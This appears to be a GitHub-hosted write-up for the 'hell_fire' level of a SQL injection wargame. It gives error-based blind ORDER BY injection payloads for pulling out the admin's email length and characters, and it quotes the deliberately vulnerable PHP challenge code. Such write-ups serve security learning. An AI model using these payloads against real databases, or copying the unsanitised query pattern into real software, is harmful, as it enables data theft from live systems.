-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy path23_hell_fire.txt
33 lines (28 loc) · 1.29 KB
/
23_hell_fire.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
find admin's email length:
query : select id,email,score from prob_hell_fire where 1 order by (case when
(id='admin' && length(email)=X) then exp(1234567890) end)
find admin's email:
query : select id,email,score from prob_hell_fire where 1 order by case when
(id='admin' && ord(mid(email,X,1))=Y) then exp(1234567890) end
using 23_hell_fire.pl script.
HELL_FIRE Clear!
http://www.wechall.net
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
$query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
$rows = mysqli_query($db,$query);
while(($result = mysqli_fetch_array($rows))){
if($result['id'] == "admin") $result['email'] = "**************";
echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
}
echo "</table><hr>query : <strong>{$query}</strong><hr>";
$_GET[email] = addslashes($_GET[email]);
$query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
highlight_file(__FILE__);
?>